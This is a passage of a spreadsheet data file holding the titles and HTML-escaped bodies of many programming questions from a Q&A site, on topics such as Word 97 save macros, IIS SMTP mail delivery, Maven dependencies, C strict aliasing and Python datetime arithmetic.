&lt;p&gt;Under options I can select "update fields when document is printed", but that's not what I want. In the VBA editor I only seem to find events for the &lt;code&gt;Document_Open()&lt;/code&gt; event, not the &lt;code&gt;Document_Save()&lt;/code&gt; event.&lt;/p&gt;
&lt;p&gt;Is it possible to get the macro to fire when the user saves the document?&lt;/p&gt;
&lt;p&gt;Please note:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;This is Word 97. I know it is
possible in later versions of Word&lt;/li&gt;
&lt;li&gt;I don't want to replace the standard
    Save button on the toolbar with a
    button to run my custom macro.
    Replacing the button on the toolbar
    applies to all documents and I only
    want it to affect this one document.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;To understand why I need this, the document contains a "SaveDate" field and I'd like this field to update on the screen when the user clicks Save. So if you can suggest another way to achieve this, then that would be just as good.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the ROWID from a Progress database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Progress database that I'm performing an ETL from.  One of the tables that I'm reading from does not have a unique key on it, so I need to access the ROWID to be able to uniquely identify the row.  What is the syntax for accessing the ROWID in Progress?&lt;/p&gt;
&lt;p&gt;I understand there are problems with using ROWID for row identification, but it's all I have right now.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NHibernate, auditing and computed column values</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How is possible to set some special column values when update/insert entities via NHibernate without extending domain classes with special properties?&lt;/p&gt;
&lt;p&gt;E.g. every table contains audit columns like CreatedBy, CreatedDate, UpdatedBy, UpdatedDate. But I dont want to add these poperties to the domain classes. I want to keep domain modedl Percistence Ignorance factor as high as possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best tool to track a process's memory usage over a long period of time in Windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best available tool to monitor the memory usage of my C#/.Net windows service over a long period of time.  As far as I know, tools like perfmon can monitor the memory usage over a short period of time, but not graphically over a long period of time.  I need trend data over days, not seconds.&lt;/p&gt;
&lt;p&gt;To be clear, I want to monitor the memory usage at a fine level of detail over a long time, and have the graph show both the whole time frame and the level of detail.  I need a small sampling interval, and a large graph.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>force Maven2 to copy dependencies into target/lib</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I get my project's runtime dependencies copied into the &lt;code&gt;target/lib&lt;/code&gt; folder?  &lt;/p&gt;
&lt;p&gt;As it is right now, after &lt;code&gt;mvn clean install&lt;/code&gt; the &lt;code&gt;target&lt;/code&gt; folder contains only my project's jar, but none of the runtime dependencies.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I fix this delphi 7 compile error - "Duplicate resource(s)"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to compile a Delphi 7 project that I've inherited, and I'm getting this error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;[Error] WARNING. Duplicate resource(s):&lt;br&gt;
  [Error]   Type  2 (BITMAP), ID EDIT:&lt;br&gt;
  [Error]     File C:[path shortened]\common\CRGrid.res resource kept; file c:\common\raptree.RES resource discarded.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It says warning, but it's actually an error - compilation does not complete.&lt;/p&gt;
&lt;p&gt;It looks like two components - CRGrid and RapTree - are colliding somehow. Does anyone have any ideas on how to fix this?&lt;/p&gt;
&lt;p&gt;Other than removing one of components from the project, of course.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WAS hosting vs. Windows Service hosting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a project using Windows 2008, .NET 3.5 and WCF for some internal services and the question of how to host the services has arisen.&lt;/p&gt;
&lt;p&gt;Since we're using Windows 2008 I was thinking it'd be good to take advantage of Windows Process Activation Service (WAS) although the feeling on the project seems to be that using  Windows Services would be better.&lt;/p&gt;
&lt;p&gt;So what's the low down on using WAS to host WCF services in comparison to a Windows Service? Are there any real advantages to using Windows Services or is WAS the way to go?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to send mail from ASP.NET with IIS6 SMTP in a dedicated server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to configure a dedicated server that runs ASP.NET to send mail through the local IIS SMTP server but mail is getting stuck in the Queue folder and doesn't get delivered.&lt;/p&gt;
&lt;p&gt;I'm using this code in an .aspx page to test:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ Page Language="C#" AutoEventWireup="true" %&amp;gt;
&amp;lt;% new System.Net.Mail.SmtpClient("localhost").Send("info@thedomain.com", 
    "jcarrascal@gmail.com", "testing...", "Hello, world.com"); %&amp;gt;    
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then, I added the following to the Web.config file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;system.net&amp;gt;
  &amp;lt;mailSettings&amp;gt;
    &amp;lt;smtp&amp;gt;
      &amp;lt;network host="localhost"/&amp;gt;
    &amp;lt;/smtp&amp;gt;
  &amp;lt;/mailSettings&amp;gt;
&amp;lt;/system.net&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the IIS Manager I've changed the following in the properties of the "Default SMTP Virtual Server".&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;General: [X] Enable Logging
Access / Authentication: [X] Windows Integrated Authentication
Access / Relay Restrictions: (o) Only the list below, Granted 127.0.0.1
Delivery / Advanced: Fully qualified domain name = thedomain.com
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Finally, I run the SMTPDiag.exe tool like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;C:\&amp;gt;smtpdiag.exe info@thedomain.com jcarrascal@gmail.com
Searching for Exchange external DNS settings.
Computer name is THEDOMAIN.
Failed to connect to the domain controller. Error: 8007054b
Checking SOA for gmail.com.
Checking external DNS servers.
Checking internal DNS servers.
SOA serial number match: Passed.
Checking local domain records.
Checking MX records using TCP: thedomain.com.
Checking MX records using UDP: thedomain.com.
Both TCP and UDP queries succeeded. Local DNS test passed.
Checking remote domain records.
Checking MX records using TCP: gmail.com.
Checking MX records using UDP: gmail.com.
Both TCP and UDP queries succeeded. Remote DNS test passed.
Checking MX servers listed for jcarrascal@gmail.com.
Connecting to gmail-smtp-in.l.google.com [209.85.199.27] on port 25.
Connecting to the server failed. Error: 10060
Failed to submit mail to gmail-smtp-in.l.google.com.
Connecting to gmail-smtp-in.l.google.com [209.85.199.114] on port 25.
Connecting to the server failed. Error: 10060
Failed to submit mail to gmail-smtp-in.l.google.com.
Connecting to alt2.gmail-smtp-in.l.google.com [209.85.135.27] on port 25.
Connecting to the server failed. Error: 10060
Failed to submit mail to alt2.gmail-smtp-in.l.google.com.
Connecting to alt2.gmail-smtp-in.l.google.com [209.85.135.114] on port 25.
Connecting to the server failed. Error: 10060
Failed to submit mail to alt2.gmail-smtp-in.l.google.com.
Connecting to alt1.gmail-smtp-in.l.google.com [209.85.133.27] on port 25.
Connecting to the server failed. Error: 10060
Failed to submit mail to alt1.gmail-smtp-in.l.google.com.
Connecting to alt2.gmail-smtp-in.l.google.com [74.125.79.27] on port 25.
Connecting to the server failed. Error: 10060
Failed to submit mail to alt2.gmail-smtp-in.l.google.com.
Connecting to alt2.gmail-smtp-in.l.google.com [74.125.79.114] on port 25.
Connecting to the server failed. Error: 10060
Failed to submit mail to alt2.gmail-smtp-in.l.google.com.
Connecting to alt1.gmail-smtp-in.l.google.com [209.85.133.114] on port 25.
Connecting to the server failed. Error: 10060
Failed to submit mail to alt1.gmail-smtp-in.l.google.com.
Connecting to gsmtp183.google.com [64.233.183.27] on port 25.
Connecting to the server failed. Error: 10060
Failed to submit mail to gsmtp183.google.com.
Connecting to gsmtp147.google.com [209.85.147.27] on port 25.
Connecting to the server failed. Error: 10051
Failed to submit mail to gsmtp147.google.com.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm using ASP.NET 2.0, Windows 2003 Server and the IIS that comes with it.&lt;/p&gt;
&lt;p&gt;Can you tell me what else to change to fix the problem?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;@mattlant&lt;/p&gt;
&lt;p&gt;This is a dedicated server that's why I'm installing the SMTP manually.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;EDIT: I use exchange so its a little
  different, but its called a smart host
  in exchange, but in plain SMTP service
  config i think its called something
  else. Cant remember exactly the
  setting name.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Thank you for pointing me at the Smart host field. Mail is getting delivered now.&lt;/p&gt;
&lt;p&gt;In the Default SMTP Virtual Server properties, the Delivery tab, click Advanced and fill the "Smart host" field with the address that your provider gives you. In my case (GoDaddy) it was k2smtpout.secureserver.net.&lt;/p&gt;
&lt;p&gt;More info here: &lt;a href="http://help.godaddy.com/article/1283" rel="nofollow"&gt;http://help.godaddy.com/article/1283&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Version control on a 2GB USB drive</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For my school work, I do a lot of switching computers (from labs to my laptop to the library).  I'd kind of like to put this code under some kind of version control.  Of course the problem is that I can't always install additional software on the computers I use.  Is there any kind of version control system that I can keep on a thumb drive?  I have a 2GB drive to put this on, but I can get a bigger one if necessary.&lt;/p&gt;
&lt;p&gt;The projects I'm doing aren't especially big FYI.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;  This needs to work under windows.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT II:&lt;/strong&gt;  Bazaar ended up being what I chose.  It's even better if you go with TortoiseBzr.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Asterisk AGI framework for IVR; Adhearsion alternative?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to get started writing scalable, telecom-grade applications with Asterisk and Ruby.  I had originally intended to use the Adhearsion framework for this, but it does not have the required maturity and its documentation is severely lacking.  AsteriskRuby seems to be a good alternative, as it's well documented and appears to be written by Vonage.&lt;/p&gt;
&lt;p&gt;Does anyone have experience deploying AGI-based IVR applications?  What framework, if any, did you use?  I'd even consider a non-Ruby one if it's justified.  Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I parse a PHP serialized datastructure in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a system that combines the best and worst of Java and PHP. I am trying to migrate a component that was once written in PHP into a Java One.&lt;/p&gt;
&lt;p&gt;Does anyone have some tips for how I can parse a PHP serialized datastructure in Java? By serialized I mean output from php's serialize function.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is your favorite hot-key in Eclipse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been using Visual Studio with Re-Sharper for the past few years and have recently taken a gig at a Java shop where we use Eclipse.  Googling for Eclipse hotkeys has returned a bunch of 'Top 10 Hot-Key' posts, but that's about it.  &lt;/p&gt;
&lt;p&gt;What are your favorite hotkeys?  And which are essential? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Focus-follows-mouse (plus auto-raise) on Mac OS X</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;(I don't want to hear about how crazy I am to want that! :)&lt;/p&gt;
&lt;p&gt;Focus-follows-mouse is also known as point-to-focus, pointer focus, and (in some implementations) sloppy focus.  [Add other terms that will make this more searchable!] X-mouse&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does having many unused beans in a Spring Bean Context waste significant resources?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My model layer is being used by a handful of different projects and I'd like to use a single XML Spring Configuration file for the model regardless of which project is using it.&lt;/p&gt;
&lt;p&gt;My question is: Since not all beans are used in all projects am I wasting resources to any significant amount if there not being instantiated?  I'm not too sure how lazy Spring is about loading them since it's never been an issue until now.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the common undefined/unspecified behavior for C that you run into?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;An example of unspecified behavior in the C language is the order of evaluation of arguments to a function.  It might be left to right or right to left, you just don't know. This would affect how foo(c++, c) or foo(++c, c) gets evaluated.&lt;/p&gt;
&lt;p&gt;What other unspecified behavior is there that can surprise the unaware programmer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I examine the configuration of a remote git repository?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a git-svn clone of an svn repo, and I want to encourage my colleagues to look at git as an option. The problem is that cloning the repo out of svn takes 3 days, but cloning from my git instance takes 10 minutes.&lt;/p&gt;
&lt;p&gt;I've got a script that will allow people to clone my git repo and re-point it at the original SVN, but it requires knowing how I set some of my config values. I'd prefer the script be able to pull those values over the wire.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get Eclipse to show .* files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;By default, Eclipse won't show my .htaccess file that I maintain in my project.  It just shows an empty folder in the Package Viewer tree.  How can I get it to show up?  No obvious preferences.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the strict aliasing rule?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When asking about &lt;a href="http://stackoverflow.com/questions/98340/what-are-the-common-undefinedunspecified-behavior-for-c-that-you-run-into"&gt;common undefined behavior in C&lt;/a&gt;, souls more enlightened than I referred to the strict aliasing rule.&lt;br /&gt;
What are they talking about?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Naturally/Numerically Sort a DataView?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am wondering how to naturally sort a DataView...  I really need help on this.  I found articles out there that can do lists with IComparable, but I need to sort the numbers in my dataview.&lt;/p&gt;
&lt;p&gt;They are currently alpha sorted because they are numbers with 'commas' in them.  Please help me out.&lt;/p&gt;
&lt;p&gt;I would like to find something instead of spending the time to create it my self.&lt;/p&gt;
&lt;p&gt;P.S.  expression and sortdirection work, but they of course Alpha sort.  Please help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Modularity of Classes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any tips or tricks to make my classes and application designs more modular?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Managing the patch level of multiple windows systems</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In an environment with multiple windows servers what is the best way to ensure patch compliance accross all systems?  &lt;/p&gt;
&lt;p&gt;Is there a simple tool (some sort of client/server app?) that allows reports to be generated showing the status of all the systems so any that aren't automatically patching themselves can be fixed without having to manually check each systemevery time an audit is needed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I have a socket accept connections only from the localhost (in Java)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a java app (not running in any application container) which listens on a ServerSocket for connections.  I would like it to only accept connections which come from localhost.  Currently, after a connection is accepted, it checks the peer IP and rejects it if it is not the loopback address, but I know that peer IP addresses can be spoofed.  So, if possible, I'd prefer to bind to a socket that only listens on the loopback interface; is this possible?&lt;/p&gt;
&lt;p&gt;I've tried a few different things (such as specifying "127.0.0.1" as the local address when calling bind()) with no luck.  Thanks in advance.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Thank you all for your help.  I'm embarrassed to admit that this was all my mistake.  Our application listens on two different ports, and I was binding one to the loopback interface but testing against the other.  When I actually try to telnet to the correct port, everything works fine (i.e., binding to "127.0.0.1" does exactly what it's supposed to).&lt;/p&gt;
&lt;p&gt;As for spoofing the loopback address, you guys are right.  I shouldn't have made it sound like the primary concern.  Really, the desired behavior is to only take local connections, and binding to only the local interface is a more direct way of achieving that than accepting all connections and then closing non-local ones.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Passing PHP associative arrays to and from XML </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an easy way to marshal a PHP associative array to and from XML? For example, I have the following array:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$items = array("1", "2",
    array(
        "item3.1" =&amp;gt; "3.1",
        "item3.2" =&amp;gt; "3.2"
        "isawesome" =&amp;gt; true
    )
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How would I turn it into something similar to the following XML in as few lines as possible, then back again?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;items&amp;gt;
    &amp;lt;item&amp;gt;1&amp;lt;/item&amp;gt;
    &amp;lt;item&amp;gt;2&amp;lt;/item&amp;gt;
    &amp;lt;item&amp;gt;
        &amp;lt;item3_1&amp;gt;3.1&amp;lt;/item3_1&amp;gt;
        &amp;lt;item3_2&amp;gt;3.2&amp;lt;/item3_2&amp;gt;
        &amp;lt;isawesome&amp;gt;true&amp;lt;/isawesome&amp;gt;
    &amp;lt;/item&amp;gt;
&amp;lt;/items&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't really care if I have to change the array structure a bit or if the XML that comes out is different to the above example. I've been trying to work with PHP's &lt;a href="http://php.net/manual/en/book.xmlreader.php"&gt;XMLReader&lt;/a&gt; and &lt;a href="http://php.net/manual/en/book.xmlwriter.php"&gt;XMLWriter&lt;/a&gt;, but the documentation is so poor and the code I've produced as a consequence looks nothing like what I feel it should look like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$xml = SomeXMLWriter::writeArrayToXml($items);
$array = SomeXMLWriter::writeXmlToArray($xml);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does it really have to be any harder than that to get a basic, raw XML dump of a PHP array without writing my own custom class?&lt;/p&gt;
&lt;p&gt;I try to avoid PEAR. In addition to the configuration headaches I've had with it, I've never stuck with any of the packages I've ever used from it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does writing and speaking on software make you a better programmer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do you think that writing about software (i.e. having a blog) and speaking on software (and concepts) make you a better programmer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does several levels of base classes slow down a class/struct in c++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does having several levels of base classes slow down a class?  A derives B derives C derives D derives F derives G, ...&lt;/p&gt;
&lt;p&gt;Does multiple inheritance slow down a class?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to get Code Coverage Analysis on an Interop Assembly?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've asked this question over on the MSDN forums also and haven't found a resolution:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://forums.microsoft.com/msdn/ShowPost.aspx?PostID=3686852&amp;amp;SiteID=1" rel="nofollow"&gt;http://forums.microsoft.com/msdn/ShowPost.aspx?PostID=3686852&amp;amp;SiteID=1&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The basic problem here as I see it is that an interop assembly doesn't actually contain any IL that can be instrumented (except for maybe a few delegates). So, although I can put together a test project that exercises the interop layer, I can't get a sense for &lt;em&gt;how many&lt;/em&gt; of those methods and properties I'm actually calling.&lt;/p&gt;
&lt;p&gt;Plan B is to go and write a code generator that creates a library of RCWWs (Runtime Callable Wrapper Wrappers), and instrument that for the purposes of code coverage.&lt;/p&gt;
&lt;p&gt;Edit: @&lt;a href="#148618" rel="nofollow"&gt;Franci Penov&lt;/a&gt;,&lt;/p&gt;
&lt;p&gt;Yes that's exactly what I want to do. The COM components delivered to us constitute a library of some dozen DLLs containing approx. 3000 types. We consume that library in our application and are charged with testing that Interop layer, since the group delivering the libraries to us does minimal testing. Code coverage would allow us to ensure that all interfaces and coclasses are exercised. That's all I'm attempting to do. We have separate test projects that exercise our own managed code.&lt;/p&gt;
&lt;p&gt;Yes, ideally the COM server team should be testing and analyzing their own code, but we don't live in an ideal world and I have to deliver a quality product based on their work. If can produce a test report indicating that I've tested 80% of their code interfaces and 50% of those don't work as advertised, I can get fixes done where fixes need to be done, and not workaround problems.&lt;/p&gt;
&lt;p&gt;The mock layer you mentioned would be useful, but wouldn't ultimately be achieving the goal of testing the Interop layer itself, and I certainly would not want to be maintaining it by hand -- we are at the mercy of the COM guys in terms of changes to the interfaces.&lt;/p&gt;
&lt;p&gt;Like I mentioned above -- the next step is to generate wrappers for the wrappers and instrument those for testing purposes.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When is it appropriate to use Time#utc in Rails 2.1?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a Rails application that needs to handle dates and times in users' time zones. We have recently migrated it to Rails 2.1 and added time zone support, but there are numerous situations in which we use Time#utc and then compare against that time. Wouldn't that be the same as comparing against the original Time object?&lt;/p&gt;
&lt;p&gt;When is it appropriate to use Time#utc in Rails 2.1? When is it inappropriate?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I create a Netflix-style iframe overlay without a huge javascript library?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use a link to open an overlay instead of in a separate popup window. This overlay should consist of a semi-transparent div layer that blocks the whole screen from being clicked on. I also aim to disable scrolling at this point. Not matter where you are on the main page, when the link is clicked, the overlay should be in the center of the screen's X and Y origins. Inside of this overlay div, should be an iframe configured such that 3 sizes of content can be loaded. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it safe to add delegates to events with keyword new?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One thing I am concerned with is that I discovered two ways of registering delegates to events.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;OnStuff += this.Handle; &lt;/li&gt;
&lt;li&gt;OnStuff += new StuffEventHandler(this.Handle);&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The first one is clean, and it makes sense doing "OnStuff -= this.Handle;" to unregister from the event... But with the latter case, should I do "OnStuff -= new StuffEventHandler(this.Handle);"? It feels like I am not removing anything at all, since I'm throwing in another StuffEventHandler reference. Does the event compare the delegate by reference? I am concerned I could start a nasty memory pool here. Get me? I don't have the reference to the "new StuffEventHandler" I previously registered.&lt;/p&gt;
&lt;p&gt;What is the downside of doing #1?&lt;/p&gt;
&lt;p&gt;What is benefit of doing #2? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse text comparison order</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Eclipse 3.4 (on Mac) and I've got an annoyance with the text comparison having the files I'm comparing in a specific order which is not what I want.&lt;/p&gt;
&lt;p&gt;When I compare two files it always seems to put the first file (alphabetically) on the left, and the latter one on the right, but I want to be able to change this on a comparison by comparison basis.&lt;br /&gt;
IE comparing 'file-a' and 'file-b' will always have 'file-a' on the left, but that isn't always what I want. I seem to recall in earlier versions of Eclipse that changing the file that was right-clicked when choosing Compare With -&gt; Each Other changed the order, but that isn't working for me in 3.4.&lt;/p&gt;
&lt;p&gt;An example of why I care:&lt;br /&gt;
I've just performed a subversion merge and had a conflict, so I now have the following files:&lt;br /&gt;
&lt;em&gt;file&lt;br /&gt;
file.merge-left&lt;br /&gt;
file.merge-right&lt;br /&gt;
file.working&lt;/em&gt;  &lt;/p&gt;
&lt;p&gt;I've made changes to &lt;em&gt;file&lt;/em&gt; and now want to compare &lt;em&gt;file&lt;/em&gt; to &lt;em&gt;file.merge-right&lt;/em&gt; and &lt;em&gt;file.working&lt;/em&gt; to &lt;em&gt;file.merge-left&lt;/em&gt; and split the editors so I can have the working/left changes sitting above the file/right changes, and then just page through the compare editors and make sure the differences between this file and the file that the merge comes from have been preserved, but &lt;em&gt;file&lt;/em&gt; is on the left while &lt;em&gt;file.working&lt;/em&gt; is on the right, and hence the differences need to be compared diagonally rather than just comparing top and bottom.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generating a unique machine id</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to write a function that generates an id that is unique for a given machine running a Windows OS.&lt;/p&gt;
&lt;p&gt;Currently, I'm using WMI to query various hardware parameters and concatenate them together and hash them to derive the unique id. My question is, what are the suggested parameters I should use? 
Currently, I'm using a combination of bios\cpu\disk data to generate the unique id. And am using the first result if multiple results are there for each metric.&lt;/p&gt;
&lt;p&gt;However, I ran into an issue where a machine that dual boots into 2 different Windows OS generates different site codes on each OS, which should ideally not happen.&lt;/p&gt;
&lt;p&gt;For reference, these are the metrics I'm currently using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Win32_Processor:UniqueID,ProcessorID,Name,Manufacturer,MaxClockSpeed
Win32_BIOS:Manufacturer
Win32_BIOS:SMBIOSBIOSVersion,IdentificationCode,SerialNumber,ReleaseDate,Version
Win32_DiskDrive:Model, Manufacturer, Signature, TotalHeads
Win32_BaseBoard:Model, Manufacturer, Name, SerialNumber
Win32_VideoController:DriverVersion, Name
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What tools do you use to implement SOA/Messaging?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://www.nservicebus.com/" rel="nofollow"&gt;NServiceBus&lt;/a&gt; and &lt;a href="http://code.google.com/p/masstransit/" rel="nofollow"&gt;MassTransit&lt;/a&gt; are two tools that can be used to implement messaging with MSMQ and other message queues.&lt;/p&gt;
&lt;p&gt;I find that once you start using messaging to have applications talk to each other, you don't really want to go back to the old RPC style.&lt;/p&gt;
&lt;p&gt;My question is, what other tools are out there? What tools do you use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why can't I delete a file in %ProgramFiles% from a Unit Test via Resharper's Test Runner Unit Test?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to write a test which, in it's fixtures Setup, it backs up a file and deletes the original, runs the test without the original present, then in the teardown, restores the original from the backup.  The file is located in my %ProgramFiles% folder.  I get an UnauthorizedAccessException on the fileInfo.Delete() statement.  I have no problem deleting this file from another test project on the same machine that is not running from the Resharper Test Runner.&lt;/p&gt;
&lt;p&gt;I can't move the file to somewhere else - it's ssapi.dll, an installed dll for Visual SourceSafe.  (Yes, I'm doing something invasive in a Unit Test.)&lt;/p&gt;
&lt;p&gt;It's the same user (me) for both ways -- I checked it via Task Manager.  My user account is a member of the local Administrators group.  What other factors are there which determine my "Authorization" to do something with a file?&lt;/p&gt;
&lt;p&gt;RESOLVED:  Though it doesn't answer my original question (which I'd still like to know the answer to), I have found a workaround for my testing purposes, using the System.Security.Permissions framewok, doing a Demand for FileIOPermissionAccess.Read in the app (non-test) code which requires the file (for an Interop call), and a Deny for the same in the test of that code which requires a scenario that that file is not there.  This should work for now (and I love having learned a bit about the System.Security.Permissions namespace)!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to check if there are symbolic links pointing to a directory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a folder on my server to which I had a number of symbolic links pointing. I've since created a new folder and I want to change all those symbolic links to point to the new folder. I'd considered replacing the original folder with a symlink to the new folder, but it seems that if I continued with that practice it could get very messy very fast.&lt;/p&gt;
&lt;p&gt;What I've been doing is manually changing the symlinks to point to the new folder, but I may have missed a couple. &lt;/p&gt;
&lt;p&gt;Is there a way to check if there are any symlinks pointing to a particular folder?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the standard way to add N seconds to datetime.time in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a &lt;code&gt;datetime.time&lt;/code&gt; value in Python, is there a standard way to add an integer number of seconds to it, so that &lt;code&gt;11:34:59&lt;/code&gt; + 3 = &lt;code&gt;11:35:02&lt;/code&gt;, for example?&lt;/p&gt;
&lt;p&gt;These obvious ideas don't work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; datetime.time(11, 34, 59) + 3
TypeError: unsupported operand type(s) for +: 'datetime.time' and 'int'
&amp;gt;&amp;gt;&amp;gt; datetime.time(11, 34, 59) + datetime.timedelta(0, 3)
TypeError: unsupported operand type(s) for +: 'datetime.time' and 'datetime.timedelta'
&amp;gt;&amp;gt;&amp;gt; datetime.time(11, 34, 59) + datetime.time(0, 0, 3)
TypeError: unsupported operand type(s) for +: 'datetime.time' and 'datetime.time'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the end I have written functions like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def add_secs_to_time(timeval, secs_to_add):
    secs = timeval.hour * 3600 + timeval.minute * 60 + timeval.second
    secs += secs_to_add
    return datetime.time(secs // 3600, (secs % 3600) // 60, secs % 60)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can't help thinking that I'm missing an easier way to do this though.&lt;/p&gt;
&lt;h3&gt;Related&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/656297/python-time-timedelta-equivalent"&gt;python time + timedelta equivalent&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Connecting to IMDB</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has any one done this before? It would seem to me that there should be a webservice but i can't find one.  I am writing an application for personal use that would just show basic info from IMDB.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mashups and SharePoint</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can somebody in SO please provide me with a list of resources about Enterprise Mashups and technologies related to SharePoint platform?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt; (as per suggestion of @Spoon16 in the comments):-
The mashup application may typically retrieve a list of contacts from a SharePoint site and display the address of a selected contact person on a map (again maybe Google maps).&lt;/p&gt;
</t>
  </si>
  <si>
